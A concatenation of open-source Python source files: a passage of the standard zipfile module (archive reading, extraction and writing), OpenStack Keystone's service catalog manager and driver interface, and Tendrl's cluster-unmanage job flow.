print(endrec)
size_cd = endrec[_ECD_SIZE] # bytes in central directory
offset_cd = endrec[_ECD_OFFSET] # offset of central directory
self._comment = endrec[_ECD_COMMENT] # archive comment
# "concat" is zero, unless zip was concatenated to another file
concat = endrec[_ECD_LOCATION] - size_cd - offset_cd
if endrec[_ECD_SIGNATURE] == stringEndArchive64:
# If Zip64 extension structures are present, account for them
concat -= (sizeEndCentDir64 + sizeEndCentDir64Locator)
if self.debug > 2:
inferred = concat + offset_cd
print("given, inferred, offset", offset_cd, inferred, concat)
# self.start_dir: Position of start of central directory
self.start_dir = offset_cd + concat
fp.seek(self.start_dir, 0)
data = fp.read(size_cd)
fp = io.BytesIO(data)
total = 0
while total < size_cd:
centdir = fp.read(sizeCentralDir)
if len(centdir) != sizeCentralDir:
raise BadZipFile("Truncated central directory")
centdir = struct.unpack(structCentralDir, centdir)
if centdir[_CD_SIGNATURE] != stringCentralDir:
raise BadZipFile("Bad magic number for central directory")
if self.debug > 2:
print(centdir)
filename = fp.read(centdir[_CD_FILENAME_LENGTH])
flags = centdir[5]
if flags & 0x800:
# UTF-8 file names extension
filename = filename.decode('utf-8')
else:
# Historical ZIP filename encoding
filename = filename.decode('cp437')
# Create ZipInfo instance to store file information
x = ZipInfo(filename)
x.extra = fp.read(centdir[_CD_EXTRA_FIELD_LENGTH])
x.comment = fp.read(centdir[_CD_COMMENT_LENGTH])
x.header_offset = centdir[_CD_LOCAL_HEADER_OFFSET]
(x.create_version, x.create_system, x.extract_version, x.reserved,
x.flag_bits, x.compress_type, t, d,
x.CRC, x.compress_size, x.file_size) = centdir[1:12]
if x.extract_version > MAX_EXTRACT_VERSION:
raise NotImplementedError("zip file version %.1f" %
(x.extract_version / 10))
x.volume, x.internal_attr, x.external_attr = centdir[15:18]
# Convert date/time code to (year, month, day, hour, min, sec)
x._raw_time = t
x.date_time = ( (d>>9)+1980, (d>>5)&0xF, d&0x1F,
t>>11, (t>>5)&0x3F, (t&0x1F) * 2 )
x._decodeExtra()
x.header_offset = x.header_offset + concat
self.filelist.append(x)
self.NameToInfo[x.filename] = x
# update total bytes read from central directory
total = (total + sizeCentralDir + centdir[_CD_FILENAME_LENGTH]
+ centdir[_CD_EXTRA_FIELD_LENGTH]
+ centdir[_CD_COMMENT_LENGTH])
if self.debug > 2:
print("total", total)
def namelist(self):
"""Return a list of file names in the archive."""
return [data.filename for data in self.filelist]
def infolist(self):
"""Return a list of class ZipInfo instances for files in the
archive."""
return self.filelist
def printdir(self, file=None):
"""Print a table of contents for the zip file."""
print("%-46s %19s %12s" % ("File Name", "Modified ", "Size"),
file=file)
for zinfo in self.filelist:
date = "%d-%02d-%02d %02d:%02d:%02d" % zinfo.date_time[:6]
print("%-46s %s %12d" % (zinfo.filename, date, zinfo.file_size),
file=file)
def testzip(self):
"""Read all the files and check the CRC."""
chunk_size = 2 ** 20
for zinfo in self.filelist:
try:
# Read by chunks, to avoid an OverflowError or a
# MemoryError with very large embedded files.
with self.open(zinfo.filename, "r") as f:
while f.read(chunk_size): # Check CRC-32
pass
except BadZipFile:
return zinfo.filename
def getinfo(self, name):
"""Return the instance of ZipInfo given 'name'."""
info = self.NameToInfo.get(name)
if info is None:
raise KeyError(
'There is no item named %r in the archive' % name)
return info
def setpassword(self, pwd):
"""Set default password for encrypted files."""
if pwd and not isinstance(pwd, bytes):
raise TypeError("pwd: expected bytes, got %s" % type(pwd))
if pwd:
self.pwd = pwd
else:
self.pwd = None
@property
def comment(self):
"""The comment text associated with the ZIP file."""
return self._comment
@comment.setter
def comment(self, comment):
if not isinstance(comment, bytes):
raise TypeError("comment: expected bytes, got %s" % type(comment))
# check for valid comment length
if len(comment) >= ZIP_MAX_COMMENT:
if self.debug:
print('Archive comment is too long; truncating to %d bytes'
% ZIP_MAX_COMMENT)
comment = comment[:ZIP_MAX_COMMENT]
self._comment = comment
self._didModify = True
def read(self, name, pwd=None):
"""Return file bytes (as a string) for name."""
with self.open(name, "r", pwd) as fp:
return fp.read()
def open(self, name, mode="r", pwd=None):
"""Return file-like object for 'name'."""
if mode not in ("r", "U", "rU"):
raise RuntimeError('open() requires mode "r", "U", or "rU"')
if pwd and not isinstance(pwd, bytes):
raise TypeError("pwd: expected bytes, got %s" % type(pwd))
if not self.fp:
raise RuntimeError(
"Attempt to read ZIP archive that was already closed")
# Only open a new file for instances where we were not
# given a file object in the constructor
if self._filePassed:
zef_file = self.fp
else:
zef_file = io.open(self.filename, 'rb')
try:
# Make sure we have an info object
if isinstance(name, ZipInfo):
# 'name' is already an info object
zinfo = name
else:
# Get info object for name
zinfo = self.getinfo(name)
zef_file.seek(zinfo.header_offset, 0)
# Skip the file header:
fheader = zef_file.read(sizeFileHeader)
if len(fheader) != sizeFileHeader:
raise BadZipFile("Truncated file header")
fheader = struct.unpack(structFileHeader, fheader)
if fheader[_FH_SIGNATURE] != stringFileHeader:
raise BadZipFile("Bad magic number for file header")
fname = zef_file.read(fheader[_FH_FILENAME_LENGTH])
if fheader[_FH_EXTRA_FIELD_LENGTH]:
zef_file.read(fheader[_FH_EXTRA_FIELD_LENGTH])
if zinfo.flag_bits & 0x20:
# Zip 2.7: compressed patched data
raise NotImplementedError("compressed patched data (flag bit 5)")
if zinfo.flag_bits & 0x40:
# strong encryption
raise NotImplementedError("strong encryption (flag bit 6)")
if zinfo.flag_bits & 0x800:
# UTF-8 filename
fname_str = fname.decode("utf-8")
else:
fname_str = fname.decode("cp437")
if fname_str != zinfo.orig_filename:
raise BadZipFile(
'File name in directory %r and header %r differ.'
% (zinfo.orig_filename, fname))
# check for encrypted flag & handle password
is_encrypted = zinfo.flag_bits & 0x1
zd = None
if is_encrypted:
if not pwd:
pwd = self.pwd
if not pwd:
raise RuntimeError("File %s is encrypted, password "
"required for extraction" % name)
zd = _ZipDecrypter(pwd)
# The first 12 bytes in the cypher stream is an encryption header
# used to strengthen the algorithm. The first 11 bytes are
# completely random, while the 12th contains the MSB of the CRC,
# or the MSB of the file time depending on the header type
# and is used to check the correctness of the password.
header = zef_file.read(12)
h = list(map(zd, header[0:12]))
if zinfo.flag_bits & 0x8:
# compare against the file type from extended local headers
check_byte = (zinfo._raw_time >> 8) & 0xff
else:
# compare against the CRC otherwise
check_byte = (zinfo.CRC >> 24) & 0xff
if h[11] != check_byte:
raise RuntimeError("Bad password for file", name)
return ZipExtFile(zef_file, mode, zinfo, zd,
close_fileobj=not self._filePassed)
except:
if not self._filePassed:
zef_file.close()
raise
def extract(self, member, path=None, pwd=None):
"""Extract a member from the archive to the current working directory,
using its full name. Its file information is extracted as accurately
as possible. `member' may be a filename or a ZipInfo object. You can
specify a different directory using `path'.
"""
if not isinstance(member, ZipInfo):
member = self.getinfo(member)
if path is None:
path = os.getcwd()
return self._extract_member(member, path, pwd)
def extractall(self, path=None, members=None, pwd=None):
"""Extract all members from the archive to the current working
directory. `path' specifies a different directory to extract to.
`members' is optional and must be a subset of the list returned
by namelist().
"""
if members is None:
members = self.namelist()
for zipinfo in members:
self.extract(zipinfo, path, pwd)
@classmethod
def _sanitize_windows_name(cls, arcname, pathsep):
"""Replace bad characters and remove trailing dots from parts."""
table = cls._windows_illegal_name_trans_table
if not table:
illegal = ':<>|"?*'
table = str.maketrans(illegal, '_' * len(illegal))
cls._windows_illegal_name_trans_table = table
arcname = arcname.translate(table)
# remove trailing dots
arcname = (x.rstrip('.') for x in arcname.split(pathsep))
# rejoin, removing empty parts.
arcname = pathsep.join(x for x in arcname if x)
return arcname
def _extract_member(self, member, targetpath, pwd):
"""Extract the ZipInfo object 'member' to a physical
file on the path targetpath.
"""
# build the destination pathname, replacing
# forward slashes to platform specific separators.
arcname = member.filename.replace('/', os.path.sep)
if os.path.altsep:
arcname = arcname.replace(os.path.altsep, os.path.sep)
# interpret absolute pathname as relative, remove drive letter or
# UNC path, redundant separators, "." and ".." components.
arcname = os.path.splitdrive(arcname)[1]
invalid_path_parts = ('', os.path.curdir, os.path.pardir)
arcname = os.path.sep.join(x for x in arcname.split(os.path.sep)
if x not in invalid_path_parts)
if os.path.sep == '\\':
# filter illegal characters on Windows
arcname = self._sanitize_windows_name(arcname, os.path.sep)
targetpath = os.path.join(targetpath, arcname)
targetpath = os.path.normpath(targetpath)
# Create all upper directories if necessary.
upperdirs = os.path.dirname(targetpath)
if upperdirs and not os.path.exists(upperdirs):
os.makedirs(upperdirs)
if member.filename[-1] == '/':
if not os.path.isdir(targetpath):
os.mkdir(targetpath)
return targetpath
with self.open(member, pwd=pwd) as source, \
open(targetpath, "wb") as target:
shutil.copyfileobj(source, target)
return targetpath
def _writecheck(self, zinfo):
"""Check for errors before writing a file to the archive."""
if zinfo.filename in self.NameToInfo:
if self.debug: # Warning for duplicate names
print("Duplicate name:", zinfo.filename)
if self.mode not in ("w", "a"):
raise RuntimeError('write() requires mode "w" or "a"')
if not self.fp:
raise RuntimeError(
"Attempt to write ZIP archive that was already closed")
_check_compression(zinfo.compress_type)
if zinfo.file_size > ZIP64_LIMIT:
if not self._allowZip64:
raise LargeZipFile("Filesize would require ZIP64 extensions")
if zinfo.header_offset > ZIP64_LIMIT:
if not self._allowZip64:
raise LargeZipFile(
"Zipfile size would require ZIP64 extensions")
def write(self, filename, arcname=None, compress_type=None):
"""Put the bytes from filename into the archive under the name
arcname."""
if not self.fp:
raise RuntimeError(
"Attempt to write to ZIP archive that was already closed")
st = os.stat(filename)
isdir = stat.S_ISDIR(st.st_mode)
mtime = time.localtime(st.st_mtime)
date_time = mtime[0:6]
# Create ZipInfo instance to store file information
if arcname is None:
arcname = filename
arcname = os.path.normpath(os.path.splitdrive(arcname)[1])
while arcname[0] in (os.sep, os.altsep):
arcname = arcname[1:]
if isdir:
arcname += '/'
zinfo = ZipInfo(arcname, date_time)
zinfo.external_attr = (st[0] & 0xFFFF) << 16 # Unix attributes
if compress_type is None:
zinfo.compress_type = self.compression
else:
zinfo.compress_type = compress_type
zinfo.file_size = st.st_size
zinfo.flag_bits = 0x00
zinfo.header_offset = self.fp.tell() # Start of header bytes
if zinfo.compress_type == ZIP_LZMA:
# Compressed data includes an end-of-stream (EOS) marker
zinfo.flag_bits |= 0x02
self._writecheck(zinfo)
self._didModify = True
if isdir:
zinfo.file_size = 0
zinfo.compress_size = 0
zinfo.CRC = 0
self.filelist.append(zinfo)
self.NameToInfo[zinfo.filename] = zinfo
self.fp.write(zinfo.FileHeader(False))
return
cmpr = _get_compressor(zinfo.compress_type)
with open(filename, "rb") as fp:
# Must overwrite CRC and sizes with correct data later
zinfo.CRC = CRC = 0
zinfo.compress_size = compress_size = 0
# Compressed size can be larger than uncompressed size
zip64 = self._allowZip64 and \
zinfo.file_size * 1.05 > ZIP64_LIMIT
self.fp.write(zinfo.FileHeader(zip64))
file_size = 0
while 1:
buf = fp.read(1024 * 8)
if not buf:
break
file_size = file_size + len(buf)
CRC = crc32(buf, CRC) & 0xffffffff
if cmpr:
buf = cmpr.compress(buf)
compress_size = compress_size + len(buf)
self.fp.write(buf)
if cmpr:
buf = cmpr.flush()
compress_size = compress_size + len(buf)
self.fp.write(buf)
zinfo.compress_size = compress_size
else:
zinfo.compress_size = file_size
zinfo.CRC = CRC
zinfo.file_size = file_size
if not zip64 and self._allowZip64:
if file_size > ZIP64_LIMIT:
raise RuntimeError('File size has increased during compressing')
if compress_size > ZIP64_LIMIT:
raise RuntimeError('Compressed size larger than uncompressed size')
# Seek backwards and write file header (which will now include
# correct CRC and file sizes)
position = self.fp.tell() # Preserve current position in file
self.fp.seek(zinfo.header_offset, 0)
self.fp.write(zinfo.FileHeader(zip64))
self.fp.seek(position, 0)
self.filelist.append(zinfo)
self.NameToInfo[zinfo.filename] = zinfo
def writestr(self, zinfo_or_arcname, data, compress_type=None):
"""Write a file into the archive. The contents is 'data', which
may be either a 'str' or a 'bytes' instance; if it is a 'str',
it is encoded as UTF-8 first.
'zinfo_or_arcname' is either a ZipInfo instance or
the name of the file in the archive."""
if isinstance(data, str):
data = data.encode("utf-8")
if not isinstance(zinfo_or_arcname, ZipInfo):
zinfo = ZipInfo(filename=zinfo_or_arcname,
date_time=time.localtime(time.time())[:6])
zinfo.compress_type = self.compression
zinfo.external_attr = 0o600 << 16
else:
zinfo = zinfo_or_arcname
if not self.fp:
raise RuntimeError(
"Attempt to write to ZIP archive that was already closed")
zinfo.file_size = len(data) # Uncompressed size
zinfo.header_offset = self.fp.tell() # Start of header data
if compress_type is not None:
zinfo.compress_type = compress_type
if zinfo.compress_type == ZIP_LZMA:
# Compressed data includes an end-of-stream (EOS) marker
zinfo.flag_bits |= 0x02
self._writecheck(zinfo)
self._didModify = True
zinfo.CRC = crc32(data) & 0xffffffff # CRC-32 checksum
co = _get_compressor(zinfo.compress_type)
if co:
data = co.compress(data) + co.flush()
zinfo.compress_size = len(data) # Compressed size
else:
zinfo.compress_size = zinfo.file_size
zip64 = zinfo.file_size > ZIP64_LIMIT or \
zinfo.compress_size > ZIP64_LIMIT
if zip64 and not self._allowZip64:
raise LargeZipFile("Filesize would require ZIP64 extensions")
self.fp.write(zinfo.FileHeader(zip64))
self.fp.write(data)
if zinfo.flag_bits & 0x08:
# Write CRC and file sizes after the file data
fmt = '<LQQ' if zip64 else '<LLL'
self.fp.write(struct.pack(fmt, zinfo.CRC, zinfo.compress_size,
zinfo.file_size))
self.fp.flush()
self.filelist.append(zinfo)
self.NameToInfo[zinfo.filename] = zinfo
def __del__(self):
"""Call the "close()" method in case the user forgot."""
self.close()
def close(self):
"""Close the file, and for mode "w" and "a" write the ending
records."""
if self.fp is None:
return
try:
if self.mode in ("w", "a") and self._didModify: # write ending records
count = 0
pos1 = self.fp.tell()
for zinfo in self.filelist: # write central directory
count = count + 1
dt = zinfo.date_time
dosdate = (dt[0] - 1980) << 9 | dt[1] << 5 | dt[2]
dostime = dt[3] << 11 | dt[4] << 5 | (dt[5] // 2)
extra = []
if zinfo.file_size > ZIP64_LIMIT \
or zinfo.compress_size > ZIP64_LIMIT:
extra.append(zinfo.file_size)
extra.append(zinfo.compress_size)
file_size = 0xffffffff
compress_size = 0xffffffff
else:
file_size = zinfo.file_size
compress_size = zinfo.compress_size
if zinfo.header_offset > ZIP64_LIMIT:
extra.append(zinfo.header_offset)
header_offset = 0xffffffff
else:
header_offset = zinfo.header_offset
extra_data = zinfo.extra
min_version = 0
if extra:
# Append a ZIP64 field to the extra's
extra_data = struct.pack(
'<HH' + 'Q'*len(extra),
1, 8*len(extra), *extra) + extra_data
min_version = ZIP64_VERSION
if zinfo.compress_type == ZIP_BZIP2:
min_version = max(BZIP2_VERSION, min_version)
elif zinfo.compress_type == ZIP_LZMA:
min_version = max(LZMA_VERSION, min_version)
extract_version = max(min_version, zinfo.extract_version)
create_version = max(min_version, zinfo.create_version)
try:
filename, flag_bits = zinfo._encodeFilenameFlags()
centdir = struct.pack(structCentralDir,
stringCentralDir, create_version,
zinfo.create_system, extract_version, zinfo.reserved,
flag_bits, zinfo.compress_type, dostime, dosdate,
zinfo.CRC, compress_size, file_size,
len(filename), len(extra_data), len(zinfo.comment),
0, zinfo.internal_attr, zinfo.external_attr,
header_offset)
except DeprecationWarning:
print((structCentralDir, stringCentralDir, create_version,
zinfo.create_system, extract_version, zinfo.reserved,
zinfo.flag_bits, zinfo.compress_type, dostime, dosdate,
zinfo.CRC, compress_size, file_size,
len(zinfo.filename), len(extra_data), len(zinfo.comment),
0, zinfo.internal_attr, zinfo.external_attr,
header_offset), file=sys.stderr)
raise
self.fp.write(centdir)
self.fp.write(filename)
self.fp.write(extra_data)
self.fp.write(zinfo.comment)
pos2 = self.fp.tell()
# Write end-of-zip-archive record
centDirCount = count
centDirSize = pos2 - pos1
centDirOffset = pos1
if (centDirCount >= ZIP_FILECOUNT_LIMIT or
centDirOffset > ZIP64_LIMIT or
centDirSize > ZIP64_LIMIT):
# Need to write the ZIP64 end-of-archive records
zip64endrec = struct.pack(
structEndArchive64, stringEndArchive64,
44, 45, 45, 0, 0, centDirCount, centDirCount,
centDirSize, centDirOffset)
self.fp.write(zip64endrec)
zip64locrec = struct.pack(
structEndArchive64Locator,
stringEndArchive64Locator, 0, pos2, 1)
self.fp.write(zip64locrec)
centDirCount = min(centDirCount, 0xFFFF)
centDirSize = min(centDirSize, 0xFFFFFFFF)
centDirOffset = min(centDirOffset, 0xFFFFFFFF)
endrec = struct.pack(structEndArchive, stringEndArchive,
0, 0, centDirCount, centDirCount,
centDirSize, centDirOffset, len(self._comment))
self.fp.write(endrec)
self.fp.write(self._comment)
self.fp.flush()
finally:
fp = self.fp
self.fp = None
if not self._filePassed:
fp.close()
class PyZipFile(ZipFile):
"""Class to create ZIP archives with Python library files and packages."""
def __init__(self, file, mode="r", compression=ZIP_STORED,
allowZip64=False, optimize=-1):
ZipFile.__init__(self, file, mode=mode, compression=compression,
allowZip64=allowZip64)
self._optimize = optimize
def writepy(self, pathname, basename=""):
"""Add all files from "pathname" to the ZIP archive.
If pathname is a package directory, search the directory and
all package subdirectories recursively for all *.py and enter
the modules into the archive. If pathname is a plain
directory, listdir *.py and enter all modules. Else, pathname
must be a Python *.py file and the module will be put into the
archive. Added modules are always module.pyo or module.pyc.
This method will compile the module.py into module.pyc if
necessary.
"""
dir, name = os.path.split(pathname)
if os.path.isdir(pathname):
initname = os.path.join(pathname, "__init__.py")
if os.path.isfile(initname):
# This is a package directory, add it
if basename:
basename = "%s/%s" % (basename, name)
else:
basename = name
if self.debug:
print("Adding package in", pathname, "as", basename)
fname, arcname = self._get_codename(initname[0:-3], basename)
if self.debug:
print("Adding", arcname)
self.write(fname, arcname)
dirlist = os.listdir(pathname)
dirlist.remove("__init__.py")
# Add all *.py files and package subdirectories
for filename in dirlist:
path = os.path.join(pathname, filename)
root, ext = os.path.splitext(filename)
if os.path.isdir(path):
if os.path.isfile(os.path.join(path, "__init__.py")):
# This is a package directory, add it
self.writepy(path, basename) # Recursive call
elif ext == ".py":
fname, arcname = self._get_codename(path[0:-3],
basename)
if self.debug:
print("Adding", arcname)
self.write(fname, arcname)
else:
# This is NOT a package directory, add its files at top level
if self.debug:
print("Adding files from directory", pathname)
for filename in os.listdir(pathname):
path = os.path.join(pathname, filename)
root, ext = os.path.splitext(filename)
if ext == ".py":
fname, arcname = self._get_codename(path[0:-3],
basename)
if self.debug:
print("Adding", arcname)
self.write(fname, arcname)
else:
if pathname[-3:] != ".py":
raise RuntimeError(
'Files added with writepy() must end with ".py"')
fname, arcname = self._get_codename(pathname[0:-3], basename)
if self.debug:
print("Adding file", arcname)
self.write(fname, arcname)
def _get_codename(self, pathname, basename):
"""Return (filename, archivename) for the path.
Given a module name path, return the correct file path and
archive name, compiling if necessary. For example, given
/python/lib/string, return (/python/lib/string.pyc, string).
"""
def _compile(file, optimize=-1):
import py_compile
if self.debug:
print("Compiling", file)
try:
py_compile.compile(file, doraise=True, optimize=optimize)
except py_compile.PyCompileError as err:
print(err.msg)
return False
return True
file_py = pathname + ".py"
file_pyc = pathname + ".pyc"
file_pyo = pathname + ".pyo"
pycache_pyc = imp.cache_from_source(file_py, True)
pycache_pyo = imp.cache_from_source(file_py, False)
if self._optimize == -1:
# legacy mode: use whatever file is present
if (os.path.isfile(file_pyo) and
os.stat(file_pyo).st_mtime >= os.stat(file_py).st_mtime):
# Use .pyo file.
arcname = fname = file_pyo
elif (os.path.isfile(file_pyc) and
os.stat(file_pyc).st_mtime >= os.stat(file_py).st_mtime):
# Use .pyc file.
arcname = fname = file_pyc
elif (os.path.isfile(pycache_pyc) and
os.stat(pycache_pyc).st_mtime >= os.stat(file_py).st_mtime):
# Use the __pycache__/*.pyc file, but write it to the legacy pyc
# file name in the archive.
fname = pycache_pyc
arcname = file_pyc
elif (os.path.isfile(pycache_pyo) and
os.stat(pycache_pyo).st_mtime >= os.stat(file_py).st_mtime):
# Use the __pycache__/*.pyo file, but write it to the legacy pyo
# file name in the archive.
fname = pycache_pyo
arcname = file_pyo
else:
# Compile py into PEP 3147 pyc file.
if _compile(file_py):
fname = (pycache_pyc if __debug__ else pycache_pyo)
arcname = (file_pyc if __debug__ else file_pyo)
else:
fname = arcname = file_py
else:
# new mode: use given optimization level
if self._optimize == 0:
fname = pycache_pyc
arcname = file_pyc
else:
fname = pycache_pyo
arcname = file_pyo
if not (os.path.isfile(fname) and
os.stat(fname).st_mtime >= os.stat(file_py).st_mtime):
if not _compile(file_py, optimize=self._optimize):
fname = arcname = file_py
archivename = os.path.split(arcname)[1]
if basename:
archivename = "%s/%s" % (basename, archivename)
return (fname, archivename)
def main(args = None):
import textwrap
USAGE=textwrap.dedent("""\
Usage:
zipfile.py -l zipfile.zip # Show listing of a zipfile
zipfile.py -t zipfile.zip # Test if a zipfile is valid
zipfile.py -e zipfile.zip target # Extract zipfile into target dir
zipfile.py -c zipfile.zip src ... # Create zipfile from sources
""")
if args is None:
args = sys.argv[1:]
if not args or args[0] not in ('-l', '-c', '-e', '-t'):
print(USAGE)
sys.exit(1)
if args[0] == '-l':
if len(args) != 2:
print(USAGE)
sys.exit(1)
with ZipFile(args[1], 'r') as zf:
zf.printdir()
elif args[0] == '-t':
if len(args) != 2:
print(USAGE)
sys.exit(1)
with ZipFile(args[1], 'r') as zf:
badfile = zf.testzip()
if badfile:
print("The following enclosed file is corrupted: {!r}".format(badfile))
print("Done testing")
elif args[0] == '-e':
if len(args) != 3:
print(USAGE)
sys.exit(1)
with ZipFile(args[1], 'r') as zf:
out = args[2]
for path in zf.namelist():
if path.startswith('./'):
tgt = os.path.join(out, path[2:])
else:
tgt = os.path.join(out, path)
tgtdir = os.path.dirname(tgt)
if not os.path.exists(tgtdir):
os.makedirs(tgtdir)
with open(tgt, 'wb') as fp:
fp.write(zf.read(path))
elif args[0] == '-c':
if len(args) < 3:
print(USAGE)
sys.exit(1)
def addToZip(zf, path, zippath):
if os.path.isfile(path):
zf.write(path, zippath, ZIP_DEFLATED)
elif os.path.isdir(path):
for nm in os.listdir(path):
addToZip(zf,
os.path.join(path, nm), os.path.join(zippath, nm))
# else: ignore
with ZipFile(args[1], 'w', allowZip64=True) as zf:
for src in args[2:]:
addToZip(zf, src, os.path.basename(src))
if __name__ == "__main__":
main()
|
ioram7/keystone-federado-pgid2013 | refs/heads/master | keystone/catalog/core.py | 5 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 OpenStack LLC
# Copyright 2012 Canonical Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Main entry point into the Catalog service."""
from keystone.common import dependency
from keystone.common import logging
from keystone.common import manager
from keystone import config
from keystone import exception
CONF = config.CONF
LOG = logging.getLogger(__name__)
def format_url(url, data):
"""Helper Method for all Backend Catalog's to Deal with URLS"""
try:
result = url.replace('$(', '%(') % data
except AttributeError:
return None
except KeyError as e:
LOG.error(_("Malformed endpoint %(url)s - unknown key %(keyerror)s") %
{"url": url,
"keyerror": str(e)})
raise exception.MalformedEndpoint(endpoint=url)
except TypeError as e:
LOG.error(_("Malformed endpoint %(url)s - unknown key %(keyerror)s"
"(are you missing brackets ?)") %
{"url": url,
"keyerror": str(e)})
raise exception.MalformedEndpoint(endpoint=url)
except ValueError as e:
LOG.error(_("Malformed endpoint %s - incomplete format \
(are you missing a type notifier ?)") % url)
raise exception.MalformedEndpoint(endpoint=url)
return result
@dependency.provider('catalog_api')
class Manager(manager.Manager):
"""Default pivot point for the Catalog backend.
See :mod:`keystone.common.manager.Manager` for more details on how this
dynamically calls the backend.
"""
def __init__(self):
super(Manager, self).__init__(CONF.catalog.driver)
def get_service(self, context, service_id):
try:
return self.driver.get_service(service_id)
except exception.NotFound:
raise exception.ServiceNotFound(service_id=service_id)
def delete_service(self, context, service_id):
try:
return self.driver.delete_service(service_id)
except exception.NotFound:
raise exception.ServiceNotFound(service_id=service_id)
def create_endpoint(self, context, endpoint_id, endpoint_ref):
try:
return self.driver.create_endpoint(endpoint_id, endpoint_ref)
except exception.NotFound:
service_id = endpoint_ref.get('service_id')
raise exception.ServiceNotFound(service_id=service_id)
def delete_endpoint(self, context, endpoint_id):
try:
return self.driver.delete_endpoint(endpoint_id)
except exception.NotFound:
raise exception.EndpointNotFound(endpoint_id=endpoint_id)
def get_endpoint(self, context, endpoint_id):
try:
return self.driver.get_endpoint(endpoint_id)
except exception.NotFound:
raise exception.EndpointNotFound(endpoint_id=endpoint_id)
def get_catalog(self, context, user_id, tenant_id, metadata=None):
try:
return self.driver.get_catalog(user_id, tenant_id, metadata)
except exception.NotFound:
raise exception.NotFound('Catalog not found for user and tenant')
class Driver(object):
"""Interface description for an Catalog driver."""
def create_service(self, service_id, service_ref):
"""Creates a new service.
:raises: keystone.exception.Conflict
"""
raise exception.NotImplemented()
def list_services(self):
"""List all services.
:returns: list of service_refs or an empty list.
"""
raise exception.NotImplemented()
def get_service(self, service_id):
"""Get service by id.
:returns: service_ref dict
:raises: keystone.exception.ServiceNotFound
"""
raise exception.NotImplemented()
def update_service(self, service_id):
"""Update service by id.
:returns: service_ref dict
:raises: keystone.exception.ServiceNotFound
"""
raise exception.NotImplemented()
def delete_service(self, service_id):
"""Deletes an existing service.
:raises: keystone.exception.ServiceNotFound
"""
raise exception.NotImplemented()
def create_endpoint(self, endpoint_id, endpoint_ref):
"""Creates a new endpoint for a service.
:raises: keystone.exception.Conflict,
keystone.exception.ServiceNotFound
"""
raise exception.NotImplemented()
def get_endpoint(self, endpoint_id):
"""Get endpoint by id.
:returns: endpoint_ref dict
:raises: keystone.exception.EndpointNotFound
"""
raise exception.NotImplemented()
def list_endpoints(self):
"""List all endpoints.
:returns: list of endpoint_refs or an empty list.
"""
raise exception.NotImplemented()
def update_endpoint(self, endpoint_id, endpoint_ref):
"""Get endpoint by id.
:returns: endpoint_ref dict
:raises: keystone.exception.EndpointNotFound
keystone.exception.ServiceNotFound
"""
raise exception.NotImplemented()
def delete_endpoint(self, endpoint_id):
"""Deletes an endpoint for a service.
:raises: keystone.exception.EndpointNotFound
"""
raise exception.NotImplemented()
def get_catalog(self, user_id, tenant_id, metadata=None):
"""Retrieve and format the current service catalog.
Example::
{ 'RegionOne':
{'compute': {
'adminURL': u'http://host:8774/v1.1/tenantid',
'internalURL': u'http://host:8774/v1.1/tenant_id',
'name': 'Compute Service',
'publicURL': u'http://host:8774/v1.1/tenantid'},
'ec2': {
'adminURL': 'http://host:8773/services/Admin',
'internalURL': 'http://host:8773/services/Cloud',
'name': 'EC2 Service',
'publicURL': 'http://host:8773/services/Cloud'}}
:returns: A nested dict representing the service catalog or an
empty dict.
:raises: keystone.exception.NotFound
"""
raise exception.NotImplemented()
def get_v3_catalog(self, user_id, tenant_id, metadata=None):
"""Retrieve and format the current V3 service catalog.
Example::
[
{
"endpoints": [
{
"interface": "public",
"id": "--endpoint-id--",
"region": "RegionOne",
"url": "http://external:8776/v1/--project-id--"
},
{
"interface": "internal",
"id": "--endpoint-id--",
"region": "RegionOne",
"url": "http://internal:8776/v1/--project-id--"
}],
"id": "--service-id--",
"type": "volume"
}]
:returns: A list representing the service catalog or an empty list
:raises: keystone.exception.NotFound
"""
raise exception.NotImplemented()
|
Tendrl/commons | refs/heads/master | tendrl/commons/flows/unmanage_cluster/__init__.py | 1 | import sys
import traceback
from tendrl.commons import flows
from tendrl.commons.flows.exceptions import FlowExecutionFailedError
from tendrl.commons.objects import AtomExecutionFailedError
class UnmanageCluster(flows.BaseFlow):
def __init__(self, *args, **kwargs):
super(UnmanageCluster, self).__init__(*args, **kwargs)
def run(self):
integration_id = self.parameters['TendrlContext.integration_id']
_cluster = NS.tendrl.objects.Cluster(
integration_id=integration_id
).load()
if _cluster.is_managed == "no":
if _cluster.current_job['job_name'] == self.__class__.__name__ \
and _cluster.current_job['status'] == 'finished':
raise FlowExecutionFailedError(
"Cluster is already in un-managed state"
)
if _cluster.current_job['status'] == 'in_progress' and \
(
'job_id' in _cluster.locked_by and
_cluster.locked_by['job_id'] != ""
) and (
_cluster.status in ['importing', 'unmanaging', 'expanding']
):
raise FlowExecutionFailedError(
"Another job in progress for cluster."
" Please wait till the job finishes "
"(job_id: %s) (cluster: %s) " %
(
_cluster.current_job['job_id'],
_cluster.short_name
)
)
_lock_details = {
'node_id': NS.node_context.node_id,
'fqdn': NS.node_context.fqdn,
'tags': NS.node_context.tags,
'type': NS.type,
'job_name': self.__class__.__name__,
'job_id': self.job_id
}
_cluster.locked_by = _lock_details
_cluster.status = "unmanaging"
_cluster.current_job = {
'job_id': self.job_id,
'job_name': self.__class__.__name__,
'status': "in_progress"
}
_cluster.save()
try:
super(UnmanageCluster, self).run()
_cluster = NS.tendrl.objects.Cluster(
integration_id=integration_id
).load()
_cluster.status = ""
_cluster.is_managed = "no"
_cluster.locked_by = {}
_cluster.errors = []
_cluster.current_job = {
'status': "finished",
'job_name': self.__class__.__name__,
'job_id': self.job_id
}
_cluster.save()
except (FlowExecutionFailedError,
AtomExecutionFailedError,
Exception) as ex:
exc_type, exc_value, exc_traceback = sys.exc_info()
_cluster = NS.tendrl.objects.Cluster(
integration_id=integration_id
).load()
_cluster.status = ""
_cluster.locked_by = {}
_cluster.current_job = {
'status': "failed",
'job_name': self.__class__.__name__,
'job_id': self.job_id
}
_errors = []
if hasattr(ex, 'message'):
_errors = [ex.message]
else:
_errors = [str(ex)]
if _errors:
_cluster.errors = _errors
_cluster.save()
raise FlowExecutionFailedError(str(
traceback.format_exception(exc_type,
exc_value,
exc_traceback)
))
|
